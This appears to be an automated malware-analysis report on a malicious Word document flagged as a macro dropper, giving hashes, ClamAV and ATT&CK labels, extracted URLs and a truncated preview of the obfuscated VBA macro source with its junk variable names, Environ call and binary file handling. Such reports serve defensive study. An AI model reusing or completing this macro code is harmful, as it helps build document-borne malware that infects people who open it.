Office (OLE) malware analysis — malicious · 49303ee1dd10a23c

MALICIOUS

Office (OLE)

4.67 MB Created: 2020-08-24 06:52:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: d6bb808b52a7dd0b1897904851eddae4 SHA-1: b7ea8f182792e226442c79330bc7da821a84d838 SHA-256: 49303ee1dd10a23c5fccd5ef4559ffbbd3e03b2adc4ec37175eb52ada1ad0bd7

130 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-9537719-0. It contains VBA macros, including a Document_Open macro, which are commonly used to initiate malicious actions upon opening the document. The presence of these macros suggests the file is a dropper intended to download and execute further malicious content.

Heuristics 5

ClamAV: Xls.Dropper.Agent-9537719-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-9537719-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.libgd.org/Documentation In document text (OLE body)
- http://www.libgd.org/In document text (OLE body)
- http://www.libgd.orgIn document text (OLE body)
- http://localhost/labelmakerIn document text (OLE body)
- http://localhost/~yourname/testwebsiteIn document text (OLE body)
- http://www.gnu.org/software/libc/manual/In document text (OLE body)
- http://bookboon.com/count/advert/eba1fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/advert/69a0fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://dev.mysql.com/doc/refman/5.1/en/index.htmlIn document text (OLE body)
- http://bookboon.com/count/advert/0d9efd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://httpd.apache.org/docs/2.2/developer/In document text (OLE body)
- http://bookboon.com/count/advert/739ffd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/advert/52a1fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/advert/11a3fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/advert/9b9dfd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/advert/aea1fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://bookboon.com/count/In document text (OLE body)
- http://bookboon.com/count/advert/67a2fd82-96d7-e011-adca-22a08ed629e5In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://khoiriyyah.blogspot.com/2012/06/vb6-hash-class-md5-sha-1-sha-256-sha.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19980 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19980 bytes
SHA-256: `eab717d5207edd4ce33ea69007bd0957717cf3179eedfb084939c27091f3aacf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub dirigibles(Roussillon) On Error Resume Next Dim Zadokabruptness As Integer Dim Sholapurcalmative As String Dim caiqueFairbanks As Long Dim bushmandene As Boolean Dim charactersalisma As String Dim Sinhalesediscant As Variant Dim apprehensivenessbleb As Variant Dim cocoaellipsographs As String Dim curettementdelimitative As Boolean Dim Faroesedetoxicants As Boolean Dim compeersDouai As Variant Dim disposalDukas As Variant Close #97 End Sub Sub Messalina(Roussillon) On Error Resume Next Dim cromlechJoni As Variant Dim electromotorsElamites As Variant Dim apportionmentsawes As Boolean Dim burlapsantitype As Boolean Dim artillerybarbarisations As Variant Open Roussillon For Binary As #97 Dim amazesduma As Variant Dim charmsCaspian As Boolean Dim IcarusAssisi As Boolean Dim LeonardHammerfest As Boolean Dim SamanthaVicksburg As Integer Dim corporalitydray As Boolean End Sub Sub doublefacednessHerculesclub(doublefacedness) On Error Resume Next Dim number_unbookmark As String Dim custodiansAzerbaijanis As Boolean Dim dengueMargate As Long Dim deistWedekind As Boolean Dim deterrentsantidepressants As Long Dim accentingaune As Long Dim auntiescarrousel As Long Dim convivialistselastin As Integer Dim accoladesbeluga As Long Dim carpetingcacodemon As Boolean Dim doinstall_imgpath As Boolean Dim confusednesscommentator As String Dim debaucheesEtonian As Variant Dim earldomsBehn As String Dim DumbartonWedgwood As Boolean Dim doubledealingcriollos As Long Dim disownmentsairintake As Boolean Dim derringerdivineness As String Dim BeaconsfieldSaba As Boolean number_unbookmark = Environ(doublefacedness) Dim Fitzroyamis As Boolean Dim Kathybedchambers As Variant Dim dodecahedronsdopattas As Boolean Dim combinesdiaconicon As Long Dim Tgroupsadversities As Boolean Dim catabasiselbows As Integer Dim disguisedisaffirmation As Variant Dim Christianizerabominations As Long Dim chicoryanil As Long ChDir (number_unbookmark) Dim browsingsareoles As Variant Dim ageismcerographist As Long Dim demurconcordances As Long Dim Atenambuscado As String Dim chalazionCornish As Integer Dim SchmidtVigo As String Dim contrapositiveRotherham As String End Sub Sub effluencebellworts(Orion, Orvieto, Foxe) On Error Resume Next Dim demoralisationbenzoyls As String Dim costarsdeterminist As Integer Dim apostatescitoles As Boolean Dim cornhuskingGigi As String Dim Sanctusbroody As Variant Dim arguingSarthe As Long Dim biofeedbackeffortlessness As String Dim bentsdiaphoretic As Long Dim economieschamfron As String Dim economiserscarcinogenicity As Variant Dim Somaliachillings As Long Dim addatabases As Long Dim RieslingAztecs As Long Dim calluschippie As Long Dim GaliciaGotham As Integer Dim amiceecru As Variant Dim denominationsdisharmonies As String Dim buskinapricots As String Dim Lovelacebathymetry As Integer Dim doinstall_imgpath As Boolean Dim GLOBALS_break As Words Dim beneficenceclockworks As String Dim deletionsboxwoods As Integer Dim Godwincontraprops As String Dim AladdinClytemnestra As Integer Dim circumfusionbigarades As Integer Dim carritchattaintures As Long Set GLOBALS_break = ThisDocument.Words updates_read = "-" On Error Resume Next Dim ananasdandyism As String Dim alkalescenciesanthem As Long Dim Onassisboon As Boolean Dim Stevenageblackamoor As String Dim Quirinusdimwits As Boolean Dim bondersaeronauts As Long Dim groupIdshop As String Dim cassiaGanesa As Long Dim ablationsalkalis As String Dim ashlarsJews As Boolean Dim barbotineclip As String Dim decorticationSwedish As Integer Dim antependiumassistance As String Dim baggingsUlric As Boolean Dim Vergilcadencies As Boolean Dim aerogrammePontormo As String Dim resetheader_mess ... (truncated)

SHA-256: eab717d5207edd4ce33ea69007bd0957717cf3179eedfb084939c27091f3aacf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dirigibles(Roussillon)
On Error Resume Next
Dim Zadokabruptness As Integer
Dim Sholapurcalmative As String
Dim caiqueFairbanks As Long
Dim bushmandene As Boolean
Dim charactersalisma As String
Dim Sinhalesediscant As Variant
Dim apprehensivenessbleb As Variant
Dim cocoaellipsographs As String
Dim curettementdelimitative As Boolean
Dim Faroesedetoxicants As Boolean
Dim compeersDouai As Variant
Dim disposalDukas As Variant

Close #97
End Sub
Sub Messalina(Roussillon)
On Error Resume Next
Dim cromlechJoni As Variant
Dim electromotorsElamites As Variant
Dim apportionmentsawes As Boolean
Dim burlapsantitype As Boolean
Dim artillerybarbarisations As Variant

Open Roussillon For Binary As #97
Dim amazesduma As Variant
Dim charmsCaspian As Boolean
Dim IcarusAssisi As Boolean
Dim LeonardHammerfest As Boolean
Dim SamanthaVicksburg As Integer
Dim corporalitydray As Boolean

End Sub
Sub doublefacednessHerculesclub(doublefacedness)
On Error Resume Next
Dim number_unbookmark As String
Dim custodiansAzerbaijanis As Boolean
Dim dengueMargate As Long
Dim deistWedekind As Boolean
Dim deterrentsantidepressants As Long
Dim accentingaune As Long
Dim auntiescarrousel As Long
Dim convivialistselastin As Integer
Dim accoladesbeluga As Long
Dim carpetingcacodemon As Boolean

Dim doinstall_imgpath As Boolean
Dim confusednesscommentator As String
Dim debaucheesEtonian As Variant
Dim earldomsBehn As String
Dim DumbartonWedgwood As Boolean
Dim doubledealingcriollos As Long
Dim disownmentsairintake As Boolean
Dim derringerdivineness As String
Dim BeaconsfieldSaba As Boolean

number_unbookmark = Environ(doublefacedness)
Dim Fitzroyamis As Boolean
Dim Kathybedchambers As Variant
Dim dodecahedronsdopattas As Boolean
Dim combinesdiaconicon As Long
Dim Tgroupsadversities As Boolean
Dim catabasiselbows As Integer
Dim disguisedisaffirmation As Variant
Dim Christianizerabominations As Long
Dim chicoryanil As Long

ChDir (number_unbookmark)
Dim browsingsareoles As Variant
Dim ageismcerographist As Long
Dim demurconcordances As Long
Dim Atenambuscado As String
Dim chalazionCornish As Integer
Dim SchmidtVigo As String
Dim contrapositiveRotherham As String

End Sub
Sub effluencebellworts(Orion, Orvieto, Foxe)
On Error Resume Next
Dim demoralisationbenzoyls As String
Dim costarsdeterminist As Integer
Dim apostatescitoles As Boolean
Dim cornhuskingGigi As String
Dim Sanctusbroody As Variant
Dim arguingSarthe As Long
Dim biofeedbackeffortlessness As String
Dim bentsdiaphoretic As Long
Dim economieschamfron As String
Dim economiserscarcinogenicity As Variant
Dim Somaliachillings As Long

Dim addatabases As Long
Dim RieslingAztecs As Long
Dim calluschippie As Long
Dim GaliciaGotham As Integer
Dim amiceecru As Variant
Dim denominationsdisharmonies As String
Dim buskinapricots As String
Dim Lovelacebathymetry As Integer

Dim doinstall_imgpath As Boolean
Dim GLOBALS_break As Words
Dim beneficenceclockworks As String
Dim deletionsboxwoods As Integer
Dim Godwincontraprops As String
Dim AladdinClytemnestra As Integer
Dim circumfusionbigarades As Integer
Dim carritchattaintures As Long

Set GLOBALS_break = ThisDocument.Words
updates_read = "-"
On Error Resume Next
Dim ananasdandyism As String
Dim alkalescenciesanthem As Long
Dim Onassisboon As Boolean
Dim Stevenageblackamoor As String
Dim Quirinusdimwits As Boolean
Dim bondersaeronauts As Long

Dim groupIdshop As String
Dim cassiaGanesa As Long
Dim ablationsalkalis As String
Dim ashlarsJews As Boolean
Dim barbotineclip As String
Dim decorticationSwedish As Integer
Dim antependiumassistance As String
Dim baggingsUlric As Boolean
Dim Vergilcadencies As Boolean
Dim aerogrammePontormo As String

Dim resetheader_mess
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.